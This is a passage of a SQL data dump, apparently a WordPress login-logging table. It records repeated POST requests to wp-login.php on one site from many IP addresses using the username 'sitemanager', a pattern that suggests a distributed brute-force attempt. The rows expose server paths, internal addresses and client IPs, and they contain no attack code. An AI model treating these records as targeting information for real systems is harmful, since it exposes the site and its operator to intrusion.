Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60148\";s:11:\"REMOTE_ADDR\";s:15:\"161.248.201.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745999933.059546;s:12:\"REQUEST_TIME\";i:1745999933;}}','161.248.201.171',0,'2025-04-30 13:28:55','1970-01-01 00:00:00'),(94508,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51668\";s:11:\"REMOTE_ADDR\";s:15:\"186.227.207.161\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746000347.546499;s:12:\"REQUEST_TIME\";i:1746000347;}}','186.227.207.161',0,'2025-04-30 13:35:49','1970-01-01 00:00:00'),(94509,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52192\";s:11:\"REMOTE_ADDR\";s:12:\"81.12.53.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746000768.229291;s:12:\"REQUEST_TIME\";i:1746000768;}}','81.12.53.206',0,'2025-04-30 13:42:50','1970-01-01 00:00:00'),(94510,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43872\";s:11:\"REMOTE_ADDR\";s:14:\"37.156.147.221\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746001186.804661;s:12:\"REQUEST_TIME\";i:1746001186;}}','37.156.147.221',0,'2025-04-30 13:49:48','1970-01-01 00:00:00'),(94511,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39702\";s:11:\"REMOTE_ADDR\";s:13:\"187.33.241.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746001609.981379;s:12:\"REQUEST_TIME\";i:1746001609;}}','187.33.241.37',0,'2025-04-30 13:56:51','1970-01-01 00:00:00'),(94512,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57038\";s:11:\"REMOTE_ADDR\";s:12:\"67.205.6.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746002450.773236;s:12:\"REQUEST_TIME\";i:1746002450;}}','67.205.6.165',0,'2025-04-30 14:10:52','1970-01-01 00:00:00'),(94513,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50964\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746002872.261667;s:12:\"REQUEST_TIME\";i:1746002872;}}','164.90.225.186',0,'2025-04-30 14:17:54','1970-01-01 00:00:00'),(94514,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42688\";s:11:\"REMOTE_ADDR\";s:13:\"170.39.213.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746003287.6593111;s:12:\"REQUEST_TIME\";i:1746003287;}}','170.39.213.43',0,'2025-04-30 14:24:49','1970-01-01 00:00:00'),(94515,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56526\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.40\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746003711.7196259;s:12:\"REQUEST_TIME\";i:1746003711;}}','164.160.91.40',0,'2025-04-30 14:31:53','1970-01-01 00:00:00'),(94516,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33674\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.209.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746004124.516778;s:12:\"REQUEST_TIME\";i:1746004124;}}','54.36.209.164',0,'2025-04-30 14:38:46','1970-01-01 00:00:00'),(94517,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39672\";s:11:\"REMOTE_ADDR\";s:12:\"52.45.232.96\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746004540.0047319;s:12:\"REQUEST_TIME\";i:1746004540;}}','52.45.232.96',0,'2025-04-30 14:45:41','1970-01-01 